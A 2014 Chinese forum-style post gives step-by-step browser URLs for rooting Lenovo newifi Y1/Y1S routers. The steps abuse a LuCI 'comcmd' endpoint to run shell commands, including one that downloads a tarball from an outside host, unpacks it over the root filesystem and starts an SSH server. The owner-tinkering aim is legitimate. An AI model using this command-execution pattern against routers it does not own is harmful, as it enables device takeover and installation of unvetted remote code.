http://write.blog.csdn.net/postedit

更新日志：
[2014-11-14] 
经确认，Y1S的新固件1.6.9.6对新的接口进行了封堵，估计之后的固件都会封堵此类接口。好吧，你们赢了。目前要在新的固件中获得路由器的root权限，可以参考@lijiwe24的帖子，利用百度samba共享插件的一个漏洞（相信很多快也会被封堵），或者直接下载论坛中已经root好的固件。

[2014-11-10] 
支持1.6.8.x及以上固件，对Y1和Y1S继续有效

联想newifi（Y1S）newifi mini（Y1）新的固件中都屏蔽了SSH后台登录功能。这里介绍一个不刷机、不重起、重起也不失效的超级简单、超级小白、绿色环保的开启SSH后台登录方法。整个过程只需要通过浏览器连续输入三个地址即可完成（其中有一个是用来测试的，实际上只要两步就够了）。

======万恶的回复可见======

本帖隐藏的内容

1. 打开浏览器，输入http://192.168.99.1，在登陆页面成功登陆后，出现下图，把红框中的字符串复制出来，用以替换第二步和第三步URL中的stok=xxxxxxxxx部分。每次登录地址栏中的这串字符都是不同的，请记下自己浏览器中出现的字符串。不懂的仔细看图。


 

2. （可选步骤，还是做一下吧）在浏览器地址栏中继续输入：

a) 1.6.8.x之前的固件
http://192.168.99.1/cgi-bin/luci/;stok=请将我替换成第一步中提取出来的字符串/admin/xcloud/comcmd?cmd=wget%20-O-%20http://xunkutech.qiniudn.com/README.txt
复制代码

b) 1.6.8.x及之后的固件
http://192.168.99.1/cgi-bin/luci/;stok=请将我替换成第一步中提取出来的字符串/admin/newwifi/comcmd?cmd=wget%20-O-%20http://xunkutech.qiniudn.com/README.txt
复制代码

如果出现下图一样的结果，请继续下一步；如果不是，请仔细检查网络设置，并重复第一步和第二步，直到出现下图的结果为止。


 

3. 继续在浏览器地址栏中继续输入：

a) 1.6.8.x之前的固件
http://192.168.99.1/cgi-bin/luci/;stok=请将我替换成第一步中提取出来的字符串/admin/xcloud/comcmd?cmd=wget%20-O-%20http://xunkutech.qiniudn.com/hacknewifi.tar.gz|tar%20-C%20/%20-zxvf-%26%26/etc/init.d/dropbear%20start
复制代码

b) 1.6.8.x及之后的固件
http://192.168.99.1/cgi-bin/luci/;stok=请将我替换成第一步中提取出来的字符串/admin/newwifi/comcmd?cmd=wget%20-O-%20http://xunkutech.qiniudn.com/hacknewifi.tar.gz|tar%20-C%20/%20-zxvf-%26%26/etc/init.d/dropbear%20start
复制代码


 

好了，现在甚至不用重起就可以用putty等ssh客户端工具连接Y1和Y1 mini了。


 

注意：
1、开启SSH后台登录会增加路由器的安全风险，务必谨慎使用；
2、路由器重起后，SSH后台登录还会继续有效；
3、路由器在恢复出厂设置后，SSH后台登录将会失效，但可以用同样的步骤再次开启；